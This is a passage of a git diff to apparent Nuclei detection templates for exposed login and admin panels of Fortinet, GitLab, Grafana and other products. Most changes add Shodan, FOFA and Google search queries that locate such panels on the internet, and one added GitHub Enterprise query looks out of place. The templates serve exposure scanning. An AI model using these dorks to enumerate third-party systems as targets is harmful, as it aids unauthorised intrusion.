8b46c42de7..b89490b157 100644 --- a/http/exposed-panels/forcepoint.yaml +++ b/http/exposed-panels/forcepoint.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:forcepoint:email_security:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: email_security vendor: forcepoint + product: email_security tags: forcepoint,panel,login http: diff --git a/http/exposed-panels/forti/fortiadc-panel.yaml b/http/exposed-panels/forti/fortiadc-panel.yaml index aa17899a86..1c34a9c066 100644 --- a/http/exposed-panels/forti/fortiadc-panel.yaml +++ b/http/exposed-panels/forti/fortiadc-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: fortiadc - shodan-query: title:"FortiADC" - vendor: fortinet verified: true + max-request: 1 + vendor: fortinet + product: fortiadc + shodan-query: + - title:"FortiADC" + - http.title:"fortiadc" + fofa-query: title="fortiadc" + google-query: intitle:"fortiadc" tags: panel,fortinet http: diff --git a/http/exposed-panels/fortinet/f5-next-central-manager.yaml b/http/exposed-panels/fortinet/f5-next-central-manager.yaml index 85944c6335..e82789c3e1 100644 --- a/http/exposed-panels/fortinet/f5-next-central-manager.yaml +++ b/http/exposed-panels/fortinet/f5-next-central-manager.yaml @@ -17,7 +17,7 @@ info: max-request: 1 vendor: f5 product: big-ip - tags: panel,fortinet,login + tags: panel,fortinet,login,f5 http: - method: GET diff --git a/http/exposed-panels/fortinet/fortiap-panel.yaml b/http/exposed-panels/fortinet/fortiap-panel.yaml index 4f3e294b49..e8d5ed7684 100644 --- a/http/exposed-panels/fortinet/fortiap-panel.yaml +++ b/http/exposed-panels/fortinet/fortiap-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:fortinet:fortiap:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: fortiap - shodan-query: title:"FortiAP" - vendor: fortinet verified: true + max-request: 1 + vendor: fortinet + product: fortiap + shodan-query: + - title:"FortiAP" + - http.title:"fortiap" + fofa-query: title="fortiap" + google-query: intitle:"fortiap" tags: panel,fortinet,fortiap http: diff --git a/http/exposed-panels/fortinet/fortiauthenticator-detect.yaml b/http/exposed-panels/fortinet/fortiauthenticator-detect.yaml index 1b5b530b4d..52256034c1 100644 --- a/http/exposed-panels/fortinet/fortiauthenticator-detect.yaml +++ b/http/exposed-panels/fortinet/fortiauthenticator-detect.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:fortinet:fortiauthenticator:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: fortinet product: fortiauthenticator shodan-query: http.favicon.hash:-1653412201 - vendor: fortinet - verified: true + fofa-query: icon_hash=-1653412201 tags: panel,fortinet,fortiauthenticator,detect http: diff --git a/http/exposed-panels/fortinet/forticlientems-panel.yaml b/http/exposed-panels/fortinet/forticlientems-panel.yaml index 50ba953014..6da792e2d5 100644 --- a/http/exposed-panels/fortinet/forticlientems-panel.yaml +++ b/http/exposed-panels/fortinet/forticlientems-panel.yaml @@ -5,9 +5,9 @@ info: author: h4sh5 severity: info metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-800551065 - verified: true tags: panel,fortinet,forticlient,ems,login,detect http: diff --git a/http/exposed-panels/fortinet/fortimail-panel.yaml b/http/exposed-panels/fortinet/fortimail-panel.yaml index 974a001ce3..080406cb6c 100644 --- a/http/exposed-panels/fortinet/fortimail-panel.yaml +++ b/http/exposed-panels/fortinet/fortimail-panel.yaml @@ -10,11 +10,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:* metadata: - fofa-query: Fortimail && port=443 max-request: 1 - product: fortimail - shodan-query: title:"Fortimail" vendor: fortinet + product: fortimail + shodan-query: + - title:"Fortimail" + - http.title:"fortimail" + fofa-query: + - Fortimail && port=443 + - fortimail && port=443 + - title="fortimail" + google-query: intitle:"fortimail" tags: panel,fortinet,fortimail,login http: diff --git a/http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml b/http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml index e2f2071d91..a7955c2491 100644 --- a/http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml @@ -11,11 +11,15 @@ info: classification: cpe: cpe:2.3:a:fortinet:fortiddos:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: fortiddos - shodan-query: http.title:"FortiDDoS" - vendor: fortinet verified: true + max-request: 1 + vendor: fortinet + product: fortiddos + shodan-query: + - http.title:"FortiDDoS" + - http.title:"fortiddos" + fofa-query: title="fortiddos" + google-query: intitle:"fortiddos" tags: panel,fortinet,fortiddos,login http: diff --git a/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml b/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml index 993d9c3700..64e3eb50c3 100644 --- a/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml @@ -14,8 +14,8 @@ info: cpe: cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: fortimanager vendor: fortinet + product: fortimanager tags: panel,fortinet,fortios,fortimanager,detect http: diff --git a/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml b/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml index 22151fe786..d7793f104c 100644 --- a/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: fortinac - shodan-query: http.title:"Fortinac" - vendor: fortinet verified: true + max-request: 1 + vendor: fortinet + product: fortinac + shodan-query: + - http.title:"Fortinac" + - http.title:"fortinac" + fofa-query: title="fortinac" + google-query: intitle:"fortinac" tags: panel,fortinet,fortinac,login http: diff --git a/http/exposed-panels/fortinet/fortinet-panel.yaml b/http/exposed-panels/fortinet/fortinet-panel.yaml index 1c72c8a177..da10e4cb83 100644 --- a/http/exposed-panels/fortinet/fortinet-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"FORTINET LOGIN" - verified: true tags: panel,fortinet,login,detect http: diff --git a/http/exposed-panels/fortinet/fortios-management-panel.yaml b/http/exposed-panels/fortinet/fortios-management-panel.yaml index 85cd4342a5..691812e475 100644 --- a/http/exposed-panels/fortinet/fortios-management-panel.yaml +++ b/http/exposed-panels/fortinet/fortios-management-panel.yaml @@ -10,11 +10,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: fortios - shodan-query: http.favicon.hash:945408572 - vendor: fortinet verified: true + max-request: 1 + vendor: fortinet + product: fortios + shodan-query: + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - port:10443 http.favicon.hash:945408572 + - http.html:"/remote/login" "xxxxxxxx" + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: panel,fortinet,fortios,fortigate,fortiproxy,fortiap http: diff --git a/http/exposed-panels/fortinet/fortios-panel.yaml b/http/exposed-panels/fortinet/fortios-panel.yaml index 10838001cc..d88ff7b12a 100644 --- a/http/exposed-panels/fortinet/fortios-panel.yaml +++ b/http/exposed-panels/fortinet/fortios-panel.yaml @@ -13,11 +13,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: fortios - shodan-query: http.favicon.hash:945408572 - vendor: fortinet verified: true + max-request: 1 + vendor: fortinet + product: fortios + shodan-query: + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - port:10443 http.favicon.hash:945408572 + - http.html:"/remote/login" "xxxxxxxx" + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: panel,fortinet,fortios http: diff --git a/http/exposed-panels/fortinet/fortisiem-panel.yaml b/http/exposed-panels/fortinet/fortisiem-panel.yaml index bfa0541c28..912db7397b 100644 --- a/http/exposed-panels/fortinet/fortisiem-panel.yaml +++ b/http/exposed-panels/fortinet/fortisiem-panel.yaml @@ -6,10 +6,10 @@ info: severity: info description: FortiSIEM login panel was detected. metadata: - shodan-query: http.favicon.hash:-1341442175 verified: true + max-request: 2 + shodan-query: "http.favicon.hash:-1341442175" tags: panel,fortisiem - flow: http(1) && http(2) http: - method: GET diff --git a/http/exposed-panels/fortinet/fortitester-login-panel.yaml b/http/exposed-panels/fortinet/fortitester-login-panel.yaml index 3060079e5b..4443660254 100644 --- a/http/exposed-panels/fortinet/fortitester-login-panel.yaml +++ b/http/exposed-panels/fortinet/fortitester-login-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:fortinet:fortitester:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: fortitester - shodan-query: title:"FortiTester" - vendor: fortinet verified: true + max-request: 2 + vendor: fortinet + product: fortitester + shodan-query: + - title:"FortiTester" + - http.title:"fortitester" + fofa-query: title="fortitester" + google-query: intitle:"fortitester" tags: panel,fortinet http: diff --git a/http/exposed-panels/fortinet/fortiweb-panel.yaml b/http/exposed-panels/fortinet/fortiweb-panel.yaml index 38cb069229..ab26296a98 100644 --- a/http/exposed-panels/fortinet/fortiweb-panel.yaml +++ b/http/exposed-panels/fortinet/fortiweb-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"FortiWeb - " - product: fortiweb vendor: fortinet + product: fortiweb + shodan-query: + - http.title:"FortiWeb - " + - http.title:"fortiweb - " + fofa-query: title="fortiweb - " + google-query: intitle:"fortiweb - " tags: panel,fortinet,fortiweb,login http: diff --git a/http/exposed-panels/fortinet/fortiwlm-panel.yaml b/http/exposed-panels/fortinet/fortiwlm-panel.yaml index aa4c6ccced..4cb84651e6 100644 --- a/http/exposed-panels/fortinet/fortiwlm-panel.yaml +++ b/http/exposed-panels/fortinet/fortiwlm-panel.yaml @@ -14,9 +14,16 @@ info: cpe: cpe:2.3:a:fortinet:fortiwlm:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: fortiwlm - shodan-query: html:"fortiwlm" vendor: fortinet + product: fortiwlm + shodan-query: + - html:"fortiwlm" + - http.html:"fortiwlm" + - http.title:"fortiwlm" + fofa-query: + - title="fortiwlm" + - body="fortiwlm" + google-query: intitle:"fortiwlm" tags: panel,fortinet,fortiwlm,login http: diff --git a/http/exposed-panels/freeipa-panel.yaml b/http/exposed-panels/freeipa-panel.yaml index bd950ef518..530e171ad6 100644 --- a/http/exposed-panels/freeipa-panel.yaml +++ b/http/exposed-panels/freeipa-panel.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:freeipa:freeipa:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: freeipa - shodan-query: html:"FreeIPA" - vendor: freeipa verified: true + max-request: 2 + vendor: freeipa + product: freeipa + shodan-query: + - html:"FreeIPA" + - http.html:"freeipa" + fofa-query: body="freeipa" tags: panel,login,freeipa http: diff --git a/http/exposed-panels/freepbx-administration-panel.yaml b/http/exposed-panels/freepbx-administration-panel.yaml index 76807a0d96..1edb14b0cf 100644 --- a/http/exposed-panels/freepbx-administration-panel.yaml +++ b/http/exposed-panels/freepbx-administration-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: freepbx - shodan-query: http.title:"FreePBX Administration" - vendor: sangoma verified: true + max-request: 1 + vendor: sangoma + product: freepbx + shodan-query: + - http.title:"FreePBX Administration" + - http.title:"freepbx administration" + fofa-query: title="freepbx administration" + google-query: intitle:"freepbx administration" tags: freepbx,panel,sangoma http: diff --git a/http/exposed-panels/friendica-panel.yaml b/http/exposed-panels/friendica-panel.yaml index cbdcfa3f96..d62c3d74c1 100644 --- a/http/exposed-panels/friendica-panel.yaml +++ b/http/exposed-panels/friendica-panel.yaml @@ -11,11 +11,15 @@ info: classification: cpe: cpe:2.3:a:friendica:friendica:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: friendica - shodan-query: http.title:"Friendica" - vendor: friendica verified: true + max-request: 1 + vendor: friendica + product: friendica + shodan-query: + - http.title:"Friendica" + - http.title:"friendica" + fofa-query: title="friendica" + google-query: intitle:"friendica" tags: friendica,panel,login,detect http: diff --git a/http/exposed-panels/froxlor-management-panel.yaml b/http/exposed-panels/froxlor-management-panel.yaml index 088c44c214..b57b705451 100644 --- a/http/exposed-panels/froxlor-management-panel.yaml +++ b/http/exposed-panels/froxlor-management-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:froxlor:froxlor:*:*:*:*:gentoo:*:*:* metadata: - max-request: 1 - product: froxlor - shodan-query: title:"Froxlor Server Management Panel" - vendor: froxlor verified: true + max-request: 1 + vendor: froxlor + product: froxlor + shodan-query: + - title:"Froxlor Server Management Panel" + - http.title:"froxlor server management panel" + fofa-query: title="froxlor server management panel" + google-query: intitle:"froxlor server management panel" tags: panel,froxlor http: diff --git a/http/exposed-panels/ftm-manager-panel.yaml b/http/exposed-panels/ftm-manager-panel.yaml index 490375daf9..fa7f204d41 100644 --- a/http/exposed-panels/ftm-manager-panel.yaml +++ b/http/exposed-panels/ftm-manager-panel.yaml @@ -10,12 +10,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ibm:financial_transaction_manager:*:*:*:*:digital_payments:*:*:* metadata: - google-query: intitle:"FTM manager" - max-request: 1 - product: financial_transaction_manager - shodan-query: http.html:"FTM manager" - vendor: ibm verified: true + max-request: 1 + vendor: ibm + product: financial_transaction_manager + shodan-query: + - http.html:"FTM manager" + - http.html:"ftm manager" + - http.title:"ftm manager" + google-query: + - intitle:"FTM manager" + - intitle:"ftm manager" + fofa-query: + - title="ftm manager" + - body="ftm manager" tags: panel,ftm,ibm http: diff --git a/http/exposed-panels/fuelcms-panel.yaml b/http/exposed-panels/fuelcms-panel.yaml index 0120b99663..89ff898341 100644 --- a/http/exposed-panels/fuelcms-panel.yaml +++ b/http/exposed-panels/fuelcms-panel.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:daylightstudio:fuel_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: fuel_cms vendor: daylightstudio + product: fuel_cms + shodan-query: http.title:"fuel cms" + fofa-query: title="fuel cms" + google-query: intitle:"fuel cms" tags: panel,fuelcms,oss,daylightstudio http: diff --git a/http/exposed-panels/fuji-xerox-printer-detect.yaml b/http/exposed-panels/fuji-xerox-printer-detect.yaml index 38f34fb4e2..1eed56192c 100644 --- a/http/exposed-panels/fuji-xerox-printer-detect.yaml +++ b/http/exposed-panels/fuji-xerox-printer-detect.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Fuji Xerox Co., Ltd" - verified: true tags: iot,panel,fuji,printer http: diff --git a/http/exposed-panels/fusionauth-admin-panel.yaml b/http/exposed-panels/fusionauth-admin-panel.yaml index e7b985e459..aaabf0294d 100644 --- a/http/exposed-panels/fusionauth-admin-panel.yaml +++ b/http/exposed-panels/fusionauth-admin-panel.yaml @@ -7,11 +7,15 @@ info: classification: cpe: cpe:2.3:a:fusionauth:fusionauth:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: fusionauth - shodan-query: title:"FusionAuth" - vendor: fusionauth verified: true + max-request: 2 + vendor: fusionauth + product: fusionauth + shodan-query: + - title:"FusionAuth" + - http.title:"fusionauth" + fofa-query: title="fusionauth" + google-query: intitle:"fusionauth" tags: panel,fusionauth,detect,login http: diff --git a/http/exposed-panels/gargoyle-router.yaml b/http/exposed-panels/gargoyle-router.yaml index a584c4547f..fe8eee3a5f 100644 --- a/http/exposed-panels/gargoyle-router.yaml +++ b/http/exposed-panels/gargoyle-router.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Gargoyle Router Management Utility" - verified: true tags: panel,iot,gargoyle,router,edb http: diff --git a/http/exposed-panels/geoserver-login-panel.yaml b/http/exposed-panels/geoserver-login-panel.yaml index 293f137891..cc4388844a 100644 --- a/http/exposed-panels/geoserver-login-panel.yaml +++ b/http/exposed-panels/geoserver-login-panel.yaml @@ -10,11 +10,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: geoserver - shodan-query: title:"GeoServer" - vendor: osgeo verified: true + max-request: 2 + vendor: osgeo + product: geoserver + shodan-query: + - title:"GeoServer" + - http.title:"geoserver" + fofa-query: + - app="geoserver" + - title="geoserver" + google-query: intitle:"geoserver" tags: panel,geoserver,osgeo http: diff --git a/http/exposed-panels/gerapy-detect.yaml b/http/exposed-panels/gerapy-detect.yaml index 392426a0d0..c1c2a585cf 100644 --- a/http/exposed-panels/gerapy-detect.yaml +++ b/http/exposed-panels/gerapy-detect.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:gerapy:gerapy:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: gerapy vendor: gerapy + product: gerapy tags: tech,gerapy,panel http: diff --git a/http/exposed-panels/gira-homeserver-homepage.yaml b/http/exposed-panels/gira-homeserver-homepage.yaml index 27e61c5edf..5620a56b23 100644 --- a/http/exposed-panels/gira-homeserver-homepage.yaml +++ b/http/exposed-panels/gira-homeserver-homepage.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Gira HomeServer 4" - verified: true tags: panel,gira http: diff --git a/http/exposed-panels/git-repository-browser.yaml b/http/exposed-panels/git-repository-browser.yaml index 38bb9e13f5..11efb99d31 100644 --- a/http/exposed-panels/git-repository-browser.yaml +++ b/http/exposed-panels/git-repository-browser.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: cgit - shodan-query: http.title:"Git repository browser" - vendor: cgit_project verified: true + max-request: 1 + vendor: cgit_project + product: cgit + shodan-query: + - http.title:"Git repository browser" + - http.title:"git repository browser" + fofa-query: title="git repository browser" + google-query: intitle:"git repository browser" tags: panel,git,cgit_project http: diff --git a/http/exposed-panels/gitblit-panel.yaml b/http/exposed-panels/gitblit-panel.yaml index 151c2f0b24..77b1573a7a 100644 --- a/http/exposed-panels/gitblit-panel.yaml +++ b/http/exposed-panels/gitblit-panel.yaml @@ -10,11 +10,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:gitblit:gitblit:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: gitblit - shodan-query: http.title:"Gitblit" - vendor: gitblit verified: true + max-request: 1 + vendor: gitblit + product: gitblit + shodan-query: + - http.title:"Gitblit" + - http.title:"gitblit" + - http.html:"gitblit" + fofa-query: + - body="gitblit" + - title="gitblit" + google-query: intitle:"gitblit" tags: panel,gitblit http: diff --git a/http/exposed-panels/gitea-login.yaml b/http/exposed-panels/gitea-login.yaml index 9428b966d2..8c3844ba11 100644 --- a/http/exposed-panels/gitea-login.yaml +++ b/http/exposed-panels/gitea-login.yaml @@ -11,9 +11,17 @@ info: cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:jenkins:*:*:* metadata: max-request: 1 - product: gitea - shodan-query: html:"Powered by Gitea Version" vendor: gitea + product: gitea + shodan-query: + - html:"Powered by Gitea Version" + - http.html:"powered by gitea version" + - http.title:"gitea" + - cpe:"cpe:2.3:a:gitea:gitea" + fofa-query: + - title="gitea" + - body="powered by gitea version" + google-query: intitle:"gitea" tags: gitea,panel http: diff --git a/http/exposed-panels/github-enterprise-detect.yaml b/http/exposed-panels/github-enterprise-detect.yaml index c3f399b194..1bf5942d9f 100644 --- a/http/exposed-panels/github-enterprise-detect.yaml +++ b/http/exposed-panels/github-enterprise-detect.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: enterprise_server - shodan-query: title:"Setup GitHub Enterprise" - vendor: github verified: true + max-request: 1 + vendor: github + product: enterprise_server + shodan-query: + - title:"Setup GitHub Enterprise" + - micro focus dsd tags: panel,github http: diff --git a/http/exposed-panels/gitlab-detect.yaml b/http/exposed-panels/gitlab-detect.yaml index 74959bbd29..b37ad1cd45 100644 --- a/http/exposed-panels/gitlab-detect.yaml +++ b/http/exposed-panels/gitlab-detect.yaml @@ -11,9 +11,14 @@ info: cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 - product: gitlab - shodan-query: http.title:"GitLab" vendor: gitlab + product: gitlab + shodan-query: + - http.title:"GitLab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: panel,gitlab http: diff --git a/http/exposed-panels/globalprotect-panel.yaml b/http/exposed-panels/globalprotect-panel.yaml index 80607b6305..f6834fd1bb 100644 --- a/http/exposed-panels/globalprotect-panel.yaml +++ b/http/exposed-panels/globalprotect-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:paloaltonetworks:globalprotect:*:*:*:*:chrome:*:*:* metadata: max-request: 2 - product: globalprotect vendor: paloaltonetworks + product: globalprotect tags: panel,panos,globalprotect,paloaltonetworks http: diff --git a/http/exposed-panels/glowroot-panel.yaml b/http/exposed-panels/glowroot-panel.yaml index 84e7cdac14..9219e8f043 100644 --- a/http/exposed-panels/glowroot-panel.yaml +++ b/http/exposed-panels/glowroot-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo?fbid=618105097026680&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: title:"Glowroot" - verified: true tags: panel,login,glowroot http: diff --git a/http/exposed-panels/glpi-panel.yaml b/http/exposed-panels/glpi-panel.yaml index 83b51c3801..710e1b2460 100644 --- a/http/exposed-panels/glpi-panel.yaml +++ b/http/exposed-panels/glpi-panel.yaml @@ -13,11 +13,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: - max-request: 3 - product: glpi - shodan-query: http.title:"GLPI" - vendor: glpi-project verified: true + max-request: 3 + vendor: glpi-project + product: glpi + shodan-query: + - http.title:"GLPI" + - http.title:"glpi" + - http.favicon.hash:"-1474875778" + fofa-query: + - title="glpi" + - icon_hash="-1474875778" + google-query: intitle:"glpi" tags: glpi,edb,panel,glpi-project http: diff --git a/http/exposed-panels/gnu-mailman.yaml b/http/exposed-panels/gnu-mailman.yaml index fed3a59f4f..eef2fc41da 100644 --- a/http/exposed-panels/gnu-mailman.yaml +++ b/http/exposed-panels/gnu-mailman.yaml @@ -11,11 +11,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:gnu:mailman:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: mailman - shodan-query: title:"Mailing Lists" - vendor: gnu verified: true + max-request: 2 + vendor: gnu + product: mailman + shodan-query: + - title:"Mailing Lists" + - http.title:"mailing lists" + - cpe:"cpe:2.3:a:gnu:mailman" + fofa-query: title="mailing lists" + google-query: intitle:"mailing lists" tags: exposure,mailman,panel,gnu http: diff --git a/http/exposed-panels/goanywhere-mft-login.yaml b/http/exposed-panels/goanywhere-mft-login.yaml index 1cf6e33ca8..b4da5ffba1 100644 --- a/http/exposed-panels/goanywhere-mft-login.yaml +++ b/http/exposed-panels/goanywhere-mft-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.html:"GoAnywhere Managed File Transfer" - verified: true tags: panel,goanywhere,login,filetransfer http: diff --git a/http/exposed-panels/gocd-login.yaml b/http/exposed-panels/gocd-login.yaml index 198b90babc..d2bb93c61e 100644 --- a/http/exposed-panels/gocd-login.yaml +++ b/http/exposed-panels/gocd-login.yaml @@ -11,9 +11,16 @@ info: cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: gocd - shodan-query: html:"GoCD Version" vendor: thoughtworks + product: gocd + shodan-query: + - html:"GoCD Version" + - http.html:"gocd version" + - http.title:"create a pipeline - go" html:"gocd version" + fofa-query: + - title="create a pipeline - go" html:"gocd version" + - body="gocd version" + google-query: intitle:"create a pipeline - go" html:"gocd version" tags: go,panel,gocd,thoughtworks http: diff --git a/http/exposed-panels/gocron-panel.yaml b/http/exposed-panels/gocron-panel.yaml index 5efaadd34e..5b9faeb0dd 100644 --- a/http/exposed-panels/gocron-panel.yaml +++ b/http/exposed-panels/gocron-panel.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="gocron-定时任务系统" max-request: 1 + fofa-query: app="gocron-定时任务系统" tags: gocron,panel http: diff --git a/http/exposed-panels/gogs-panel.yaml b/http/exposed-panels/gogs-panel.yaml index 403505d3a4..dc890bedd6 100644 --- a/http/exposed-panels/gogs-panel.yaml +++ b/http/exposed-panels/gogs-panel.yaml @@ -12,12 +12,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"Sign In - Gogs" - max-request: 1 - product: gogs - shodan-query: title:"Sign In - Gogs" - vendor: gogs verified: true + max-request: 1 + vendor: gogs + product: gogs + shodan-query: + - title:"Sign In - Gogs" + - http.title:"sign in - gogs" + - cpe:"cpe:2.3:a:gogs:gogs" + google-query: + - intitle:"Sign In - Gogs" + - intitle:"sign in - gogs" + fofa-query: title="sign in - gogs" tags: panel,gogs http: diff --git a/http/exposed-panels/goodjob-dashboard.yaml b/http/exposed-panels/goodjob-dashboard.yaml index 25de5981a9..5b09ba466b 100644 --- a/http/exposed-panels/goodjob-dashboard.yaml +++ b/http/exposed-panels/goodjob-dashboard.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/bensheldon/good_job metadata: - max-request: 2 verified: true + max-request: 2 tags: unauth,panel,goodjob http: diff --git a/http/exposed-panels/gotify-panel.yaml b/http/exposed-panels/gotify-panel.yaml index a8c44e2aca..04392d6dde 100644 --- a/http/exposed-panels/gotify-panel.yaml +++ b/http/exposed-panels/gotify-panel.yaml @@ -10,11 +10,15 @@ info: classification: cpe: cpe:2.3:a:gotify:server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: server - shodan-query: http.title:"Gotify" - vendor: gotify verified: true + max-request: 1 + vendor: gotify + product: server + shodan-query: + - http.title:"Gotify" + - http.title:"gotify" + fofa-query: title="gotify" + google-query: intitle:"gotify" tags: panel,gotify,login,detect http: diff --git a/http/exposed-panels/gradle/gradle-enterprise-panel.yaml b/http/exposed-panels/gradle/gradle-enterprise-panel.yaml index daf8b22393..39bd511370 100644 --- a/http/exposed-panels/gradle/gradle-enterprise-panel.yaml +++ b/http/exposed-panels/gradle/gradle-enterprise-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:gradle:gradle_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: gradle_enterprise vendor: gradle + product: gradle_enterprise tags: panel,gradle http: diff --git a/http/exposed-panels/grafana-detect.yaml b/http/exposed-panels/grafana-detect.yaml index 8b6ce6302a..e0ebf285e4 100644 --- a/http/exposed-panels/grafana-detect.yaml +++ b/http/exposed-panels/grafana-detect.yaml @@ -10,11 +10,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: - category: devops max-request: 2 - product: grafana - shodan-query: title:"Grafana" vendor: grafana + product: grafana + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + category: devops + fofa-query: + - title="grafana" + - app="grafana" + google-query: intitle:"grafana" tags: panel,grafana,detect http: diff --git a/http/exposed-panels/grails-database-admin-console.yaml b/http/exposed-panels/grails-database-admin-console.yaml index 49a5fd9567..a779d5ba45 100644 --- a/http/exposed-panels/grails-database-admin-console.yaml +++ b/http/exposed-panels/grails-database-admin-console.yaml @@ -15,8 +15,8 @@ info: cpe: cpe:2.3:a:grails:grails:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: grails vendor: grails + product: grails tags: grails,panel http: diff --git a/http/exposed-panels/graylog-panel.yaml b/http/exposed-panels/graylog-panel.yaml index c379cf6c1c..953269d225 100644 --- a/http/exposed-panels/graylog-panel.yaml +++ b/http/exposed-panels/graylog-panel.yaml @@ -9,9 